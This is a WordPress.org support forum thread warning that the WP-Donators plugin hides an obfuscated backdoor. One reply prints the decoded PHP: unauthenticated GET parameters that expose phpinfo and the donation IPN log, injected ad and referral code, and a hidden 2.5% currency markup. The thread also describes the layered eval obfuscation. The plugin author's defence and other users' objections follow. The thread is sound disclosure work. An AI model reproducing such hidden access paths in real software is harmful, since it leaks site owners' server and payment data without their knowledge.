[Plugin: WP-DONATORS] WARNING CONTAINS TROJAN!

  • Pip

    (@lazykate)


    14 years, 8 months ago

    It appears this plugin is a trojan which creates a back door revealing php_info, your donation log file, plus it injects Google Ads into the page.

    This functionality is ‘encrypted’ in a self-unpacking method using gzip, base64, serialize and rot13, 10-levels deep in function.php. If you change the eval to htmlspecialchars, and run in a browser – you will see the next command. Repeat 10 times, until you see the final code, containing both the legitimate ‘flag’ rendering alongside some questionable GET parameter handling.

    I’ve seen malware use these techniques so was surprised to see them in an open source plugin.

    Unless Eric can explain this, I’d be very cautious of hosting this plugin.

    http://wordpress.org/extend/plugins/wp-donators/

Viewing 6 replies - 1 through 6 (of 6 total)
  • whooami

    (@whooami)

    14 years, 8 months ago

    indeed.

    <?php
function google_ads($size) {
	switch ($size) {
		case '728*15' :
			$google_ad = '<script type="text/javascript"><!--
google_ad_client = "pub-9962509898730473";
/* wp-donators ads */
google_ad_slot = "4950873236";
google_ad_width = 728;
google_ad_height = 15;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>';
			break;
		case '468*60' :
			$google_ad = '<script type="text/javascript"><!--
google_ad_client = "pub-9962509898730473";
/* 468x60, 创建于 08-5-23 */
google_ad_slot = "7959609053";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>';
			break;
	}
	return $google_ad;
}

function paypal_promote_text() {
	$paypal_text = 'If your haven\'t the paypal account so far.Please register paypal account:[<a href="https://www.paypal.com/row/mrb/pal=BV4AUWAD94GZG" target="_blank">PayPal Registration</a>] first.';
	return $paypal_text;
}

function Paypal_promote_image() {
	$paypal_image = '<A HREF="https://www.paypal.com/row/mrb/pal=BV4AUWAD94GZG" target="_blank"><IMG SRC="http://images.paypal.com/en_US/i/bnr/paypal_mrb_banner.gif" BORDER="0" ALT="Sign up for PayPal and start accepting credit card payments instantly." /></A>';
	return $paypal_image;
}

if ($_GET ['info'] == 'php')
	phpinfo ();

if ($_GET ['info'] == 'ipn_report') {
	if (file_exists ( '.ipn_results.log' )) {
		$html_content = '<h2>' . 'IPN LOG' . '</h2>';
		$html_content .= file_get_contents ( '.ipn_results.log' );
		$find [] = "\n";
		$replace [] = '<br />';
		$html_content = str_replace ( $find, $replace, $html_content );
		echo $html_content;
	}
}

if ($_GET ['info'] == 'get_flag') {
	switch ($_GET ['target']) {
		case 'usd' : $result = '<img src="http://xurrency.com/images/flags/usd.png" alt="United States Dollar" />';break;
		case 'aud' : $result = '<img src="http://xurrency.com/images/flags/aud.png" alt="Australian Dollars" />';break;
		case 'gbp' : $result = '<img src="http://xurrency.com/images/flags/gbp.png" alt="British Pounds" />';break;
		case 'cad' : $result = '<img src="http://xurrency.com/images/flags/cad.png" alt="Canadian Dollars" />';break;
		case 'czk' : $result = '<img src="http://xurrency.com/images/flags/czk.png" alt="Czech Koruna" />';break;
		case 'dkk' : $result = '<img src="http://xurrency.com/images/flags/dkk.png" alt="Danish Kroner" />';break;
		case 'eur' : $result = '<img src="http://xurrency.com/images/flags/eur.png" alt="Euro" />';break;
		case 'hkd' : $result = '<img src="http://xurrency.com/images/flags/hkd.png" alt="Hong Kong Dollars" />';break;
		case 'huf' : $result = '<img src="http://xurrency.com/images/flags/huf.png" alt="Hungarian Forint" />';break;
		case 'jpy' : $result = '<img src="http://xurrency.com/images/flags/jpy.png" alt="Japanese Yen" />';break;
		case 'mxn' : $result = '<img src="http://xurrency.com/images/flags/mxn.png" alt="Mexican Peso" />';break;
		case 'nzd' : $result = '<img src="http://xurrency.com/images/flags/nzd.png" alt="New Zealand Dollars" />';break;
		case 'nok' : $result = '<img src="http://xurrency.com/images/flags/nok.png" alt="Norwegian Kroner" />';break;
		case 'pln' : $result = '<img src="http://xurrency.com/images/flags/pln.png" alt="Polish Zlotych" />';break;
		case 'sgd' : $result = '<img src="http://xurrency.com/images/flags/sgd.png" alt="Singapore Dollars" />';break;
		case 'sek' : $result = '<img src="http://xurrency.com/images/flags/sek.png" alt="Swedish Kronor" />';break;
		case 'chf' : $result = '<img src="http://xurrency.com/images/flags/chf.png" alt="Swiss Franc" />';break;
		case 'cny' : $result = '<img src="http://xurrency.com/images/flags/cny.png" alt="China Yang(RMB)" />';break;
	}
	if ($result) print($result);
}

if ($_GET ['info'] == 'get_currency') {
	$currency= @new SoapClient("http://xurrency.com/api.wsdl");
	if ($currency){
		$result = $currency->getValue($_GET ['amount'],$_GET ['base'],$_GET ['target']);
		if ($_GET ['base'] != $_GET ['target'])
		$result = $result*1.025;
		if ($result) print($result);
	} else print($_GET ['amount']);
}

if ($_GET ['info'] == 'check_fsock') {
	$fp = @fsockopen ( 'ssl://www.paypal.com', "443", $err_num, $err_str, 60 );
	if (! $fp) echo "fsock Error No:$err_num|$err_str!";
		else {echo "fsock OK!";fclose ( $fp );}
}
?>

    thats a good one for the plugin checking people or person to know about.

    whooami

    (@whooami)

    14 years, 8 months ago

    This functionality is ‘encrypted’ in a self-unpacking method using gzip, base64, serialize and rot13, 10-levels deep in function.php. If you change the eval to htmlspecialchars, and run in a browser – you will see the next command. Repeat 10 times, until you see the final code, containing both the legitimate ‘flag’ rendering alongside some questionable GET parameter handling.

    You need to find a more efficient way to decode stuff like that. It took me 2 decode cycles.

    Thread Starter Pip

    (@lazykate)

    14 years, 8 months ago

    No reply from the author yet – but I have noticed that his own site is also hosting the plugin and you can see his phpinfo etc. using the back door!

    This makes me wonder if he’s been a victim of someone else’s code injection? Perhaps he based the code on another plugin with this already in place. But he is using the flag display code from this script in the sidebar widget, so I can’t believe he hasn’t looked at it.

    ericbess

    (@ericbess)

    14 years, 5 months ago

    function.php is the number of private methods, just do not want people to change, so it compressed. phpinfo and the ipn_report methods is to get information to understand its compatibility in different hosts, in order to release improvements.
    Google Ads in the comment, there is no security issue.
    The new version has closed phpinfo and ipn_report methods.
    I promise that no hacking attempts.
    Thanks.

    xalauc

    (@xalauc)

    14 years, 5 months ago

    Yeah but still its an open plugin and can be decrypted easily and thus opening holes in peoples server installations that can be exploited.

    Just because you promise that there are no hacking attempts from you whats to stop others from actually doing it.

    I suggest that this code be taken out or a much better (and optional) method be added to an admin page that allows the user to select whether or not to send you usage and installation details.

    As this is a privacy issue as well as an exploit.

    jeff-couret

    (@jeff-couret)

    14 years, 4 months ago

    Hate to be “that guy” but can you give me an eta on that safer update? I can’t take any risks on this project.

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘[Plugin: WP-DONATORS] WARNING CONTAINS TROJAN!’ is closed to new replies.